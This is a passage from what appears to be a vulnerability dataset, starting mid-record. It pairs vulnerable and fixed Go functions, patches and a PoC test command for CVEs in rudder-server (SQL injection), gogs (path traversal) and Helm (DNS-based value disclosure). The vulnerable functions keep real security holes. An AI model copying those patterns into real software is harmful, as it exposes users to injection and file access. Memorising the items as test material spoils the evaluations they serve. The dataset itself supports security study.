failedEvent.RecordID, createdAt)\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t}\n\n\t\tstmt.Close()\n\t}\n}"}, {"id": "fix_go_28_2", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 91, "end_line": 103, "snippet": "func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n\tif !failedKeysEnabled {\n\t\treturn\n\t}\n\n\t// Drop table\n\ttable := getSqlSafeTablename(taskRunID)\n\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n\t_, err := fem.dbHandle.Exec(sqlStatement)\n\tif err != nil {\n\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n\t}\n}"}, {"id": "fix_go_28_3", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 105, "end_line": 134, "snippet": "func (fem *FailedEventsManagerT) FetchFailedRecordIDs(taskRunID string) []*FailedEventRowT {\n\tif !failedKeysEnabled {\n\t\treturn []*FailedEventRowT{}\n\t}\n\n\tfailedEvents := make([]*FailedEventRowT, 0)\n\n\tvar rows *sql.Rows\n\tvar err error\n\ttable := getSqlSafeTablename(taskRunID)\n\tsqlStatement := fmt.Sprintf(`SELECT %[1]s.destination_id, %[1]s.record_id\n FROM %[1]s `, table)\n\trows, err = fem.dbHandle.Query(sqlStatement)\n\tif err != nil {\n\t\tpkgLogger.Errorf(\"Failed to fetch from table %s with error: %v\", taskRunID, err)\n\t\treturn failedEvents\n\t}\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\t\tvar failedEvent FailedEventRowT\n\t\terr := rows.Scan(&failedEvent.DestinationID, &failedEvent.RecordID)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tfailedEvents = append(failedEvents, &failedEvent)\n\t}\n\n\treturn failedEvents\n}"}, {"id": "fix_go_28_4", "commit": "0d061ff", "file_path": "router/failed-events-manager.go", "start_line": 192, "end_line": 194, "snippet": "func getSqlSafeTablename(taskRunID string) string {\n\treturn `\"` + strings.ReplaceAll(fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID), `\"`, `\"\"`) + `\"`\n}"}], "vul_patch": "--- a/router/failed-events-manager.go\n+++ b/router/failed-events-manager.go\n@@ -1,13 +1,37 @@\n-func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n+func (*FailedEventsManagerT) SaveFailedRecordIDs(taskRunIDFailedEventsMap map[string][]*FailedEventRowT, txn *sql.Tx) {\n \tif !failedKeysEnabled {\n \t\treturn\n \t}\n \n-\t// Drop table\n-\ttable := fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID)\n-\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n-\t_, err := fem.dbHandle.Exec(sqlStatement)\n-\tif err != nil {\n-\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n+\tfor taskRunID, failedEvents := range taskRunIDFailedEventsMap {\n+\t\ttable := getSqlSafeTablename(taskRunID)\n+\t\tsqlStatement := fmt.Sprintf(`CREATE TABLE IF NOT EXISTS %s (\n+\t\tdestination_id TEXT NOT NULL,\n+\t\trecord_id JSONB NOT NULL,\n+\t\tcreated_at TIMESTAMP NOT NULL);`, table)\n+\t\t_, err := txn.Exec(sqlStatement)\n+\t\tif err != nil {\n+\t\t\t_ = txn.Rollback()\n+\t\t\tpanic(err)\n+\t\t}\n+\t\tinsertQuery := fmt.Sprintf(`INSERT INTO %s VALUES($1, $2, $3);`, table)\n+\t\tstmt, err := txn.Prepare(insertQuery)\n+\t\tif err != nil {\n+\t\t\t_ = txn.Rollback()\n+\t\t\tpanic(err)\n+\t\t}\n+\t\tcreatedAt := time.Now()\n+\t\tfor _, failedEvent := range failedEvents {\n+\t\t\tif len(failedEvent.RecordID) == 0 || !json.Valid(failedEvent.RecordID) {\n+\t\t\t\tpkgLogger.Infof(\"skipped adding invalid recordId: %s, to failed keys table: %s\", failedEvent.RecordID, table)\n+\t\t\t\tcontinue\n+\t\t\t}\n+\t\t\t_, err = stmt.Exec(failedEvent.DestinationID, failedEvent.RecordID, createdAt)\n+\t\t\tif err != nil {\n+\t\t\t\tpanic(err)\n+\t\t\t}\n+\t\t}\n+\n+\t\tstmt.Close()\n \t}\n }\n\n--- /dev/null\n+++ b/router/failed-events-manager.go\n@@ -0,0 +1,13 @@\n+func (fem *FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {\n+\tif !failedKeysEnabled {\n+\t\treturn\n+\t}\n+\n+\t// Drop table\n+\ttable := getSqlSafeTablename(taskRunID)\n+\tsqlStatement := fmt.Sprintf(`DROP TABLE IF EXISTS %s`, table)\n+\t_, err := fem.dbHandle.Exec(sqlStatement)\n+\tif err != nil {\n+\t\tpkgLogger.Errorf(\"Failed to drop table %s with error: %v\", taskRunID, err)\n+\t}\n+}\n\n--- /dev/null\n+++ b/router/failed-events-manager.go\n@@ -0,0 +1,30 @@\n+func (fem *FailedEventsManagerT) FetchFailedRecordIDs(taskRunID string) []*FailedEventRowT {\n+\tif !failedKeysEnabled {\n+\t\treturn []*FailedEventRowT{}\n+\t}\n+\n+\tfailedEvents := make([]*FailedEventRowT, 0)\n+\n+\tvar rows *sql.Rows\n+\tvar err error\n+\ttable := getSqlSafeTablename(taskRunID)\n+\tsqlStatement := fmt.Sprintf(`SELECT %[1]s.destination_id, %[1]s.record_id\n+ FROM %[1]s `, table)\n+\trows, err = fem.dbHandle.Query(sqlStatement)\n+\tif err != nil {\n+\t\tpkgLogger.Errorf(\"Failed to fetch from table %s with error: %v\", taskRunID, err)\n+\t\treturn failedEvents\n+\t}\n+\tdefer rows.Close()\n+\n+\tfor rows.Next() {\n+\t\tvar failedEvent FailedEventRowT\n+\t\terr := rows.Scan(&failedEvent.DestinationID, &failedEvent.RecordID)\n+\t\tif err != nil {\n+\t\t\tpanic(err)\n+\t\t}\n+\t\tfailedEvents = append(failedEvents, &failedEvent)\n+\t}\n+\n+\treturn failedEvents\n+}\n\n--- /dev/null\n+++ b/router/failed-events-manager.go\n@@ -0,0 +1,3 @@\n+func getSqlSafeTablename(taskRunID string) string {\n+\treturn `\"` + strings.ReplaceAll(fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID), `\"`, `\"\"`) + `\"`\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-30625:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/rudder-server\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestDropFailedRecordIDs$ github.com/rudderlabs/rudder-server/router\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-1993", "cve_description": "Path Traversal in GitHub repository gogs/gogs prior to 0.12.9.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/9bf748b6c4c9a17d3aa77f6b9abcfae65451febf"], "programing_language": "Go", "vul_func": [{"id": "vul_go_105_1", "commit": "e370657", "file_path": "internal/route/repo/http.go", "start_line": 394, "end_line": 439, "snippet": "func HTTP(c *HTTPContext) {\n\tfor _, route := range routes {\n\t\treqPath := strings.ToLower(c.Req.URL.Path)\n\t\tm := route.re.FindStringSubmatch(reqPath)\n\t\tif m == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\t// We perform check here because route matched in cmd/web.go is wider than needed,\n\t\t// but we only want to output this message only if user is really trying to access\n\t\t// Git HTTP endpoints.\n\t\tif conf.Repository.DisableHTTPGit {\n\t\t\tc.Error(http.StatusForbidden, \"Interacting with repositories by HTTP protocol is disabled\")\n\t\t\treturn\n\t\t}\n\n\t\tif route.method != c.Req.Method {\n\t\t\tc.NotFound()\n\t\t\treturn\n\t\t}\n\n\t\tfile := strings.TrimPrefix(reqPath, m[1]+\"/\")\n\t\tdir, err := getGitRepoPath(m[1])\n\t\tif err != nil {\n\t\t\tlog.Warn(\"HTTP.getGitRepoPath: %v\", err)\n\t\t\tc.NotFound()\n\t\t\treturn\n\t\t}\n\n\t\troute.handler(serviceHandler{\n\t\t\tw: c.Resp,\n\t\t\tr: c.Req.Request,\n\t\t\tdir: dir,\n\t\t\tfile: file,\n\n\t\t\tauthUser: c.AuthUser,\n\t\t\townerName: c.OwnerName,\n\t\t\townerSalt: c.OwnerSalt,\n\t\t\trepoID: c.RepoID,\n\t\t\trepoName: c.RepoName,\n\t\t})\n\t\treturn\n\t}\n\n\tc.NotFound()\n}"}], "fix_func": [{"id": "fix_go_105_1", "commit": "9bf748b", "file_path": "internal/route/repo/http.go", "start_line": 395, "end_line": 446, "snippet": "func HTTP(c *HTTPContext) {\n\tfor _, route := range routes {\n\t\treqPath := strings.ToLower(c.Req.URL.Path)\n\t\tm := route.re.FindStringSubmatch(reqPath)\n\t\tif m == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\t// We perform check here because route matched in cmd/web.go is wider than needed,\n\t\t// but we only want to output this message only if user is really trying to access\n\t\t// Git HTTP endpoints.\n\t\tif conf.Repository.DisableHTTPGit {\n\t\t\tc.Error(http.StatusForbidden, \"Interacting with repositories by HTTP protocol is disabled\")\n\t\t\treturn\n\t\t}\n\n\t\tif route.method != c.Req.Method {\n\t\t\tc.Error(http.StatusNotFound)\n\t\t\treturn\n\t\t}\n\n\t\tcleaned := pathutil.Clean(m[1])\n\t\tif m[1] != \"/\"+cleaned {\n\t\t\tc.Error(http.StatusBadRequest, \"Request path contains suspicious characters\")\n\t\t\treturn\n\t\t}\n\n\t\tfile := strings.TrimPrefix(reqPath, cleaned)\n\t\tdir, err := getGitRepoPath(cleaned)\n\t\tif err != nil {\n\t\t\tlog.Warn(\"HTTP.getGitRepoPath: %v\", err)\n\t\t\tc.Error(http.StatusNotFound)\n\t\t\treturn\n\t\t}\n\n\t\troute.handler(serviceHandler{\n\t\t\tw: c.Resp,\n\t\t\tr: c.Req.Request,\n\t\t\tdir: dir,\n\t\t\tfile: file,\n\n\t\t\tauthUser: c.AuthUser,\n\t\t\townerName: c.OwnerName,\n\t\t\townerSalt: c.OwnerSalt,\n\t\t\trepoID: c.RepoID,\n\t\t\trepoName: c.RepoName,\n\t\t})\n\t\treturn\n\t}\n\n\tc.Error(http.StatusNotFound)\n}"}], "vul_patch": "--- a/internal/route/repo/http.go\n+++ b/internal/route/repo/http.go\n@@ -15,15 +15,21 @@\n \t\t}\n \n \t\tif route.method != c.Req.Method {\n-\t\t\tc.NotFound()\n+\t\t\tc.Error(http.StatusNotFound)\n \t\t\treturn\n \t\t}\n \n-\t\tfile := strings.TrimPrefix(reqPath, m[1]+\"/\")\n-\t\tdir, err := getGitRepoPath(m[1])\n+\t\tcleaned := pathutil.Clean(m[1])\n+\t\tif m[1] != \"/\"+cleaned {\n+\t\t\tc.Error(http.StatusBadRequest, \"Request path contains suspicious characters\")\n+\t\t\treturn\n+\t\t}\n+\n+\t\tfile := strings.TrimPrefix(reqPath, cleaned)\n+\t\tdir, err := getGitRepoPath(cleaned)\n \t\tif err != nil {\n \t\t\tlog.Warn(\"HTTP.getGitRepoPath: %v\", err)\n-\t\t\tc.NotFound()\n+\t\t\tc.Error(http.StatusNotFound)\n \t\t\treturn\n \t\t}\n \n@@ -42,5 +48,5 @@\n \t\treturn\n \t}\n \n-\tc.NotFound()\n+\tc.Error(http.StatusNotFound)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-25165", "cve_description": "Helm is a tool that streamlines installing and managing Kubernetes applications.`getHostByName` is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with `helm install|upgrade|template` or when the Helm SDK is used to render a chart. Information passed into the chart can be disclosed to the DNS servers used to lookup the IP address. For example, a malicious chart could inject `getHostByName` into a chart in order to disclose values to a malicious DNS server. The issue has been fixed in Helm 3.11.1. Prior to using a chart with Helm verify the `getHostByName` function is not being used in a template to disclose any information you do not want passed to DNS servers.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/helm/helm", "patch_url": ["https://github.com/helm/helm/commit/5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2"], "programing_language": "Go", "vul_func": [{"id": "vul_go_49_1", "commit": "5bf273d81ba7da1816a55983fae6a6cf4ca29af2", "file_path": "pkg/engine/engine.go", "start_line": 37, "end_line": 45, "snippet": "type Engine struct {\n\t// If strict is enabled, template rendering will fail if a template references\n\t// a value that was not passed in.\n\tStrict bool\n\t// In LintMode, some 'required' template values may be missing, so don't fail\n\tLintMode bool\n\t// the rest config to connect to the kubernetes api\n\tconfig *rest.Config\n}"}, {"id": "vul_go_49_2", "commit": "5bf273d81ba7da1816a55983fae6a6cf4ca29af2", "file_path": "pkg/engine/engine.go", "start_line": 107, "end_line": 193, "snippet": "func (e Engine) initFunMap(t *template.Template, referenceTpls map[string]renderable) {\n\tfuncMap := funcMap()\n\tincludedNames := make(map[string]int)\n\n\t// Add the 'include' function here so we can close over t.\n\tfuncMap[\"include\"] = func(name string, data interface{}) (string, error) {\n\t\tvar buf strings.Builder\n\t\tif v, ok := includedNames[name]; ok {\n\t\t\tif v > recursionMaxNums {\n\t\t\t\treturn \"\", errors.Wrapf(fmt.Errorf(\"unable to execute template\"), \"rendering template has a nested reference name: %s\", name)\n\t\t\t}\n\t\t\tincludedNames[name]++\n\t\t} else {\n\t\t\tincludedNames[name] = 1\n\t\t}\n\t\terr := t.ExecuteTemplate(&buf, name, data)\n\t\tincludedNames[name]--\n\t\treturn buf.String(), err\n\t}\n\n\t// Add the 'tpl' function here\n\tfuncMap[\"tpl\"] = func(tpl string, vals chartutil.Values) (string, error) {\n\t\tbasePath, err := vals.PathValue(\"Template.BasePath\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Basepath from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplateName, err := vals.PathValue(\"Template.Name\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Name from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplates := map[string]renderable{\n\t\t\ttemplateName.(string): {\n\t\t\t\ttpl: tpl,\n\t\t\t\tvals: vals,\n\t\t\t\tbasePath: basePath.(string),\n\t\t\t},\n\t\t}\n\n\t\tresult, err := e.renderWithReferences(templates, referenceTpls)\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"error during tpl function execution for %q\", tpl)\n\t\t}\n\t\treturn result[templateName.(string)], nil\n\t}\n\n\t// Add the `required` function here so we can use lintMode\n\tfuncMap[\"required\"] = func(warn string, val interface{}) (interface{}, error) {\n\t\tif val == nil {\n\t\t\tif e.LintMode {\n\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\treturn \"\", nil\n\t\t\t}\n\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t} else if _, ok := val.(string); ok {\n\t\t\tif val == \"\" {\n\t\t\t\tif e.LintMode {\n\t\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\t\treturn \"\", nil\n\t\t\t\t}\n\t\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t\t}\n\t\t}\n\t\treturn val, nil\n\t}\n\n\t// Override sprig fail function for linting and wrapping message\n\tfuncMap[\"fail\"] = func(msg string) (string, error) {\n\t\tif e.LintMode {\n\t\t\t// Don't fail when linting\n\t\t\tlog.Printf(\"[INFO] Fail: %s\", msg)\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(warnWrap(msg))\n\t}\n\n\t// If we are not linting and have a cluster connection, provide a Kubernetes-backed\n\t// implementation.\n\tif !e.LintMode && e.config != nil {\n\t\tfuncMap[\"lookup\"] = NewLookupFunction(e.config)\n\t}\n\n\tt.Funcs(funcMap)\n}"}], "fix_func": [{"id": "fix_go_49_1", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/engine/engine.go", "start_line": 37, "end_line": 54, "snippet": "type Engine struct {\n\t// If strict is enabled, template rendering will fail if a template references\n\t// a value that was not passed in.\n\tStrict bool\n\t// In LintMode, some 'required' template values may be missing, so don't fail\n\tLintMode bool\n\t// the rest config to connect to the kubernetes api\n\tconfig *rest.Config\n\t// EnableDNS tells the engine to allow DNS lookups when rendering templates\n\tEnableDNS bool\n}\n\n// New creates a new instance of Engine using the passed in rest config.\nfunc New(config *rest.Config) Engine {\n\treturn Engine{\n\t\tconfig: config,\n\t}\n}"}, {"id": "fix_go_49_2", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/engine/engine.go", "start_line": 116, "end_line": 210, "snippet": "func (e Engine) initFunMap(t *template.Template, referenceTpls map[string]renderable) {\n\tfuncMap := funcMap()\n\tincludedNames := make(map[string]int)\n\n\t// Add the 'include' function here so we can close over t.\n\tfuncMap[\"include\"] = func(name string, data interface{}) (string, error) {\n\t\tvar buf strings.Builder\n\t\tif v, ok := includedNames[name]; ok {\n\t\t\tif v > recursionMaxNums {\n\t\t\t\treturn \"\", errors.Wrapf(fmt.Errorf(\"unable to execute template\"), \"rendering template has a nested reference name: %s\", name)\n\t\t\t}\n\t\t\tincludedNames[name]++\n\t\t} else {\n\t\t\tincludedNames[name] = 1\n\t\t}\n\t\terr := t.ExecuteTemplate(&buf, name, data)\n\t\tincludedNames[name]--\n\t\treturn buf.String(), err\n\t}\n\n\t// Add the 'tpl' function here\n\tfuncMap[\"tpl\"] = func(tpl string, vals chartutil.Values) (string, error) {\n\t\tbasePath, err := vals.PathValue(\"Template.BasePath\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Basepath from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplateName, err := vals.PathValue(\"Template.Name\")\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"cannot retrieve Template.Name from values inside tpl function: %s\", tpl)\n\t\t}\n\n\t\ttemplates := map[string]renderable{\n\t\t\ttemplateName.(string): {\n\t\t\t\ttpl: tpl,\n\t\t\t\tvals: vals,\n\t\t\t\tbasePath: basePath.(string),\n\t\t\t},\n\t\t}\n\n\t\tresult, err := e.renderWithReferences(templates, referenceTpls)\n\t\tif err != nil {\n\t\t\treturn \"\", errors.Wrapf(err, \"error during tpl function execution for %q\", tpl)\n\t\t}\n\t\treturn result[templateName.(string)], nil\n\t}\n\n\t// Add the `required` function here so we can use lintMode\n\tfuncMap[\"required\"] = func(warn string, val interface{}) (interface{}, error) {\n\t\tif val == nil {\n\t\t\tif e.LintMode {\n\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\treturn \"\", nil\n\t\t\t}\n\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t} else if _, ok := val.(string); ok {\n\t\t\tif val == \"\" {\n\t\t\t\tif e.LintMode {\n\t\t\t\t\t// Don't fail on missing required values when linting\n\t\t\t\t\tlog.Printf(\"[INFO] Missing required value: %s\", warn)\n\t\t\t\t\treturn \"\", nil\n\t\t\t\t}\n\t\t\t\treturn val, errors.Errorf(warnWrap(warn))\n\t\t\t}\n\t\t}\n\t\treturn val, nil\n\t}\n\n\t// Override sprig fail function for linting and wrapping message\n\tfuncMap[\"fail\"] = func(msg string) (string, error) {\n\t\tif e.LintMode {\n\t\t\t// Don't fail when linting\n\t\t\tlog.Printf(\"[INFO] Fail: %s\", msg)\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(warnWrap(msg))\n\t}\n\n\t// If we are not linting and have a cluster connection, provide a Kubernetes-backed\n\t// implementation.\n\tif !e.LintMode && e.config != nil {\n\t\tfuncMap[\"lookup\"] = NewLookupFunction(e.config)\n\t}\n\n\t// When DNS lookups are not enabled override the sprig function and return\n\t// an empty string.\n\tif !e.EnableDNS {\n\t\tfuncMap[\"getHostByName\"] = func(name string) string {\n\t\t\treturn \"\"\n\t\t}\n\t}\n\n\tt.Funcs(funcMap)\n}"}, {"id": "fix_go_49_3", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/upgrade.go", "start_line": 43, "end_line": 108, "snippet": "type Upgrade struct {\n\tcfg *Configuration\n\n\tChartPathOptions\n\n\t// Install is a purely informative flag that indicates whether this upgrade was done in \"install\" mode.\n\t//\n\t// Applications may use this to determine whether this Upgrade operation was done as part of a\n\t// pure upgrade (Upgrade.Install == false) or as part of an install-or-upgrade operation\n\t// (Upgrade.Install == true).\n\t//\n\t// Setting this to `true` will NOT cause `Upgrade` to perform an install if the release does not exist.\n\t// That process must be handled by creating an Install action directly. See cmd/upgrade.go for an\n\t// example of how this flag is used.\n\tInstall bool\n\t// Devel indicates that the operation is done in devel mode.\n\tDevel bool\n\t// Namespace is the namespace in which this operation should be performed.\n\tNamespace string\n\t// SkipCRDs skips installing CRDs when install flag is enabled during upgrade\n\tSkipCRDs bool\n\t// Timeout is the timeout for this operation\n\tTimeout time.Duration\n\t// Wait determines whether the wait operation should be performed after the upgrade is requested.\n\tWait bool\n\t// WaitForJobs determines whether the wait operation for the Jobs should be performed after the upgrade is requested.\n\tWaitForJobs bool\n\t// DisableHooks disables hook processing if set to true.\n\tDisableHooks bool\n\t// DryRun controls whether the operation is prepared, but not executed.\n\t// If `true`, the upgrade is prepared but not performed.\n\tDryRun bool\n\t// Force will, if set to `true`, ignore certain warnings and perform the upgrade anyway.\n\t//\n\t// This should be used with caution.\n\tForce bool\n\t// ResetValues will reset the values to the chart's built-ins rather than merging with existing.\n\tResetValues bool\n\t// ReuseValues will re-use the user's last supplied values.\n\tReuseValues bool\n\t// Recreate will (if true) recreate pods after a rollback.\n\tRecreate bool\n\t// MaxHistory limits the maximum number of revisions saved per release\n\tMaxHistory int\n\t// Atomic, if true, will roll back on failure.\n\tAtomic bool\n\t// CleanupOnFail will, if true, cause the upgrade to delete newly-created resources on a failed update.\n\tCleanupOnFail bool\n\t// SubNotes determines whether sub-notes are rendered in the chart.\n\tSubNotes bool\n\t// Description is the description of this operation\n\tDescription string\n\t// PostRender is an optional post-renderer\n\t//\n\t// If this is non-nil, then after templates are rendered, they will be sent to the\n\t// post renderer before sending to the Kubernetes API server.\n\tPostRenderer postrender.PostRenderer\n\t// DisableOpenAPIValidation controls whether OpenAPI validation is enforced.\n\tDisableOpenAPIValidation bool\n\t// Get missing dependencies\n\tDependencyUpdate bool\n\t// Lock to control raceconditions when the process receives a SIGTERM\n\tLock sync.Mutex\n\t// Enable DNS lookups when rendering templates\n\tEnableDNS bool\n}"}, {"id": "fix_go_49_4", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/upgrade.go", "start_line": 169, "end_line": 263, "snippet": "func (u *Upgrade) prepareUpgrade(name string, chart *chart.Chart, vals map[string]interface{}) (*release.Release, *release.Release, error) {\n\tif chart == nil {\n\t\treturn nil, nil, errMissingChart\n\t}\n\n\t// finds the last non-deleted release with the given name\n\tlastRelease, err := u.cfg.Releases.Last(name)\n\tif err != nil {\n\t\t// to keep existing behavior of returning the \"%q has no deployed releases\" error when an existing release does not exist\n\t\tif errors.Is(err, driver.ErrReleaseNotFound) {\n\t\t\treturn nil, nil, driver.NewErrNoDeployedReleases(name)\n\t\t}\n\t\treturn nil, nil, err\n\t}\n\n\t// Concurrent `helm upgrade`s will either fail here with `errPending` or when creating the release with \"already exists\". This should act as a pessimistic lock.\n\tif lastRelease.Info.Status.IsPending() {\n\t\treturn nil, nil, errPending\n\t}\n\n\tvar currentRelease *release.Release\n\tif lastRelease.Info.Status == release.StatusDeployed {\n\t\t// no need to retrieve the last deployed release from storage as the last release is deployed\n\t\tcurrentRelease = lastRelease\n\t} else {\n\t\t// finds the deployed release with the given name\n\t\tcurrentRelease, err = u.cfg.Releases.Deployed(name)\n\t\tif err != nil {\n\t\t\tif errors.Is(err, driver.ErrNoDeployedReleases) &&\n\t\t\t\t(lastRelease.Info.Status == release.StatusFailed || lastRelease.Info.Status == release.StatusSuperseded) {\n\t\t\t\tcurrentRelease = lastRelease\n\t\t\t} else {\n\t\t\t\treturn nil, nil, err\n\t\t\t}\n\t\t}\n\t}\n\n\t// determine if values will be reused\n\tvals, err = u.reuseValues(chart, currentRelease, vals)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tif err := chartutil.ProcessDependencies(chart, vals); err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\t// Increment revision count. This is passed to templates, and also stored on\n\t// the release object.\n\trevision := lastRelease.Version + 1\n\n\toptions := chartutil.ReleaseOptions{\n\t\tName: name,\n\t\tNamespace: currentRelease.Namespace,\n\t\tRevision: revision,\n\t\tIsUpgrade: true,\n\t}\n\n\tcaps, err := u.cfg.getCapabilities()\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tvaluesToRender, err := chartutil.ToRenderValues(chart, vals, options, caps)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\thooks, manifestDoc, notesTxt, err := u.cfg.renderResources(chart, valuesToRender, \"\", \"\", u.SubNotes, false, false, u.PostRenderer, u.DryRun, u.EnableDNS)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\t// Store an upgraded release.\n\tupgradedRelease := &release.Release{\n\t\tName: name,\n\t\tNamespace: currentRelease.Namespace,\n\t\tChart: chart,\n\t\tConfig: vals,\n\t\tInfo: &release.Info{\n\t\t\tFirstDeployed: currentRelease.Info.FirstDeployed,\n\t\t\tLastDeployed: Timestamper(),\n\t\t\tStatus: release.StatusPendingUpgrade,\n\t\t\tDescription: \"Preparing upgrade\", // This should be overwritten later.\n\t\t},\n\t\tVersion: revision,\n\t\tManifest: manifestDoc.String(),\n\t\tHooks: hooks,\n\t}\n\n\tif len(notesTxt) > 0 {\n\t\tupgradedRelease.Info.Notes = notesTxt\n\t}\n\terr = validateManifest(u.cfg.KubeClient, manifestDoc.Bytes(), !u.DisableOpenAPIValidation)\n\treturn currentRelease, upgradedRelease, err\n}"}, {"id": "fix_go_49_5", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/install.go", "start_line": 66, "end_line": 108, "snippet": "type Install struct {\n\tcfg *Configuration\n\n\tChartPathOptions\n\n\tClientOnly bool\n\tForce bool\n\tCreateNamespace bool\n\tDryRun bool\n\tDisableHooks bool\n\tReplace bool\n\tWait bool\n\tWaitForJobs bool\n\tDevel bool\n\tDependencyUpdate bool\n\tTimeout time.Duration\n\tNamespace string\n\tReleaseName string\n\tGenerateName bool\n\tNameTemplate string\n\tDescription string\n\tOutputDir string\n\tAtomic bool\n\tSkipCRDs bool\n\tSubNotes bool\n\tDisableOpenAPIValidation bool\n\tIncludeCRDs bool\n\t// KubeVersion allows specifying a custom kubernetes version to use and\n\t// APIVersions allows a manual set of supported API Versions to be passed\n\t// (for things like templating). These are ignored if ClientOnly is false\n\tKubeVersion *chartutil.KubeVersion\n\tAPIVersions chartutil.VersionSet\n\t// Used by helm template to render charts with .Release.IsUpgrade. Ignored if Dry-Run is false\n\tIsUpgrade bool\n\t// Enable DNS lookups when rendering templates\n\tEnableDNS bool\n\t// Used by helm template to add the release as part of OutputDir path\n\t// OutputDir/\n\tUseReleaseName bool\n\tPostRenderer postrender.PostRenderer\n\t// Lock to control raceconditions when the process receives a SIGTERM\n\tLock sync.Mutex\n}"}, {"id": "fix_go_49_6", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/install.go", "start_line": 192, "end_line": 357, "snippet": "func (i *Install) RunWithContext(ctx context.Context, chrt *chart.Chart, vals map[string]interface{}) (*release.Release, error) {\n\t// Check reachability of cluster unless in client-only mode (e.g. `helm template` without `--validate`)\n\tif !i.ClientOnly {\n\t\tif err := i.cfg.KubeClient.IsReachable(); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif err := i.availableName(); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err := chartutil.ProcessDependencies(chrt, vals); err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Pre-install anything in the crd/ directory. We do this before Helm\n\t// contacts the upstream server and builds the capabilities object.\n\tif crds := chrt.CRDObjects(); !i.ClientOnly && !i.SkipCRDs && len(crds) > 0 {\n\t\t// On dry run, bail here\n\t\tif i.DryRun {\n\t\t\ti.cfg.Log(\"WARNING: This chart or one of its subcharts contains CRDs. Rendering may fail or contain inaccuracies.\")\n\t\t} else if err := i.installCRDs(crds); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif i.ClientOnly {\n\t\t// Add mock objects in here so it doesn't use Kube API server\n\t\t// NOTE(bacongobbler): used for `helm template`\n\t\ti.cfg.Capabilities = chartutil.DefaultCapabilities.Copy()\n\t\tif i.KubeVersion != nil {\n\t\t\ti.cfg.Capabilities.KubeVersion = 